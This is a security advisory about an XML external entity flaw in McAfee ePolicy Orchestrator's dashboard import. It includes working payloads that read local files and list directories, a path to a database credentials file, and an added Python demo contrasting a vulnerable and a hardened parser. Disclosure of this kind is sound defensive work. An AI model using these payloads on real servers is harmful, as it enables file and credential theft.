McAfee ePolicy Orchestrator XML External Entity Expansion

Posted Feb 25, 2014
Site redteam-pentesting.de

RedTeam Pentesting identified an XML external entity expansion vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature. Users with the ability to create new dashboards in the ePO web interface who exploit this vulnerability can read local files on the ePO server, including sensitive data like the ePO database configuration. Versions 4.6.7 and below are affected.

tags | exploit, web, local
MD5 | 724d2b023c9019167f3cd08127c26878

Advisory: McAfee ePolicy Orchestrator XML External Entity Expansion in
Dashboard

RedTeam Pentesting identified an XML external entity expansion
vulnerability in McAfee ePolicy Orchestrator's (ePO) dashboard feature.
Users with the ability to create new dashboards in the ePO web interface
who exploit this vulnerability can read local files on the ePO server,
including sensitive data like the ePO database configuration.


Details
=======

Product: McAfee ePolicy Orchestrator
Affected Versions: 4.6.7 and below
Fixed Versions: 4.6.7 + hotfix 940148
Vulnerability Type: XML External Entity Expansion
Security Risk: high
Vendor URL: http://www.mcafee.com/uk/products/epolicy-orchestrator.aspx
Vendor Status: hotfix released
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-001
Advisory Status: public
CVE: GENERIC-MAP-NOMATCH
CVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

McAfee ePO allows administrators to centrally manage other systems,
including deploying new software and collecting system information.
Dashboards allow privileged users to view statistics and current data
about ePO and the systems it manages.


More Details
============

Users with access to McAfee ePO's web interface can have the permission
to add new dashboards. Dashboard definitions can be exported as XML data
and imported again. A basic XML dashboard definition looks as follows:

<dashboard id="1">
<name>RedTeam Pentesting</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

Importing a dashboard consists of uploading the XML data and confirming
the import afterwards. On the confirmation page, the dashboard's name as
defined in the XML element "name" is shown.

The ePO system accepts XML data that carries a user-defined DTD, so the
uploader can declare additional entities, which the parser expands. The
following example results in a dashboard with the name "RedTeam
Pentesting Entity":

<?xml version="1.0"?>
<!DOCTYPE dashboard [
<!ENTITY redteam "RedTeam Pentesting Entity">
]>
<dashboard id="1">
<name>&redteam;</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to declare external entities, for example ones that
point to local files on the ePO server. Such an entity is expanded to
the file's contents. This works as long as the file's contents do not
make the resulting XML data invalid; data that cannot be read this way
includes, for example, binary data and files that themselves contain
XML markup.

If the entity is used in the dashboard's name, the confirmation page
shown when importing a dashboard displays the contents of the file.

The following example XML data can be uploaded to read the file
C:\boot.ini:

<?xml version="1.0"?>
<!DOCTYPE dashboard [
<!ENTITY redteam SYSTEM "file:///c:/boot.ini">
]>
<dashboard id="1">
<name>&redteam;</name>
<filteringEnabled>false</filteringEnabled>
</dashboard>

It is also possible to get directory listings by using a file URL that
points to a directory, for example the C: drive:

<!ENTITY redteam SYSTEM "file:///c:/">
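
As an added example (not part of the advisory and not ePO's code), the
following Python script reproduces the import behaviour described above
with the standard library's xml.sax parser. External general entities
are switched on to stand in for the vulnerable importer; a constructed
db.properties-style file is then read through the advisory's payload, a
constructed file containing a bare "<" shows the well-formedness limit,
and a hardened importer that rejects any DOCTYPE blocks the same
payload. The names dashboard_payload, vulnerable_import, hardened_import
and demo, the temporary files and their contents are this example's own
assumptions. The directory-listing variant depends on the server's
file: URL handler returning a listing and is not reproduced here, since
Python's urllib refuses to open a directory.

```python
"""Constructed demonstration of the dashboard-import XXE described above.

Not ePO's code: a stand-in parser built on Python's stdlib xml.sax, with
external general entities switched on to mimic the vulnerable importer,
beside a hardened variant that rejects any DOCTYPE outright.
"""
import io
import pathlib
import tempfile
import xml.sax
import xml.sax.handler


class _NameCollector(xml.sax.handler.ContentHandler):
    """Collects the text of <name>, which the confirmation page displays."""

    def __init__(self):
        super().__init__()
        self._in_name = False
        self._parts = []

    def startElement(self, name, attrs):
        if name == "name":
            self._in_name = True

    def endElement(self, name):
        if name == "name":
            self._in_name = False

    def characters(self, content):
        if self._in_name:
            self._parts.append(content)

    @property
    def name(self):
        return "".join(self._parts)


class _DoctypeRejecter:
    """Lexical handler that refuses any DTD, so no entity can be declared."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError("DOCTYPE not allowed in dashboard definitions")

    def endDTD(self):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass

    def comment(self, content):
        pass


def dashboard_payload(file_uri):
    """Build the advisory's payload with an external entity in <name>."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE dashboard [\n"
        f'<!ENTITY redteam SYSTEM "{file_uri}">\n'
        "]>\n"
        '<dashboard id="1">\n'
        "<name>&redteam;</name>\n"
        "<filteringEnabled>false</filteringEnabled>\n"
        "</dashboard>\n"
    )


def vulnerable_import(xml_text):
    """Importer with external entity resolution enabled (the flaw).

    Returns the dashboard name, or None when the included data makes the
    document ill-formed and the parse fails, as the advisory describes.
    """
    collector = _NameCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    # The bug: the parser fetches SYSTEM entities itself (file:// included).
    parser.setFeature(xml.sax.handler.feature_external_ges, True)
    try:
        parser.parse(io.BytesIO(xml_text.encode()))
    except xml.sax.SAXParseException:
        return None
    return collector.name


def hardened_import(xml_text):
    """Same import, but any DOCTYPE is rejected before entities exist."""
    collector = _NameCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setProperty(xml.sax.handler.property_lexical_handler, _DoctypeRejecter())
    # feature_external_ges stays at its default (False) as a second line of defence.
    parser.parse(io.BytesIO(xml_text.encode()))
    return collector.name


def demo():
    """Write two constructed files and show which one the flaw leaks."""
    with tempfile.TemporaryDirectory() as tmp:
        props = pathlib.Path(tmp, "db.properties")  # constructed stand-in
        props.write_text("db.user=epo_admin\ndb.passwd=s3cr3t\n")
        broken = pathlib.Path(tmp, "notes.txt")  # a bare '<' breaks the XML
        broken.write_text("if a < b then fail\n")

        leaked = vulnerable_import(dashboard_payload(props.as_uri()))
        unreadable = vulnerable_import(dashboard_payload(broken.as_uri()))
        try:
            hardened_import(dashboard_payload(props.as_uri()))
            blocked = False
        except ValueError:
            blocked = True
    return leaked, unreadable, blocked
```

Calling demo() returns the leaked file text, None for the file that made
the document ill-formed, and True for the hardened importer having
refused the payload. Rejecting the DOCTYPE means the importer does not
need to know which entity is harmful; in production the same effect is
usually obtained with defusedxml or by disabling DTD processing in
whatever XML parser the application uses.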


Workaround
==========

RedTeam Pentesting is not aware of any workarounds.


Fix
===

McAfee has issued a hotfix[0] for version 4.6.7 that removes the
vulnerability. An upgrade to the newer 5.x branch of the product will
also resolve this problem.


Security Risk
=============

Successful exploitation requires valid login credentials for the ePO
system and the permission to create dashboards, which limits the
vulnerability's exposure.

It is still considered high risk, however, as it gives attackers the
opportunity to read potentially sensitive files on the server. These
include, for example, ePO's database credentials, which are typically
stored in a file at a path like the following:

C:\programs\mcafee\epolicy orchestrator\server\conf\orion\db.properties

The credentials in this file are encrypted with a static key that is
publicly known and included for example in Metasploit[1].

Depending on the actual network structure, it might be possible to use
the decrypted credentials to read and alter the information in the ePO
database. This might lead to a compromise of the clients that are
managed by ePO.


Timeline
========

2013-11-20 Vulnerability identified
2013-11-22 Customer decided to coordinate disclosure with vendor
2014-02-14 Vendor replied to customer
2014-02-24 Vendor released hotfix for version 4.6.7 and a public
Security Bulletin[0]
2014-02-25 Advisory released


References
==========

[0] https://kc.mcafee.com/corporate/index?page=content&id=SB10065
[1] https://github.com/rapid7/metasploit-framework/blob/master/modules/post/windows/gather/credentials/epo_sql.rb


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests and short
pentests, performed by a team of specialised IT-security experts. In
this way, security weaknesses in company networks or products are
uncovered and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance public knowledge through research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
https://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH
Dennewartstr. 25-27
52068 Aachen
Germany
Tel.: +49 241 510081-0
Fax : +49 241 510081-99
https://www.redteam-pentesting.de
Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen
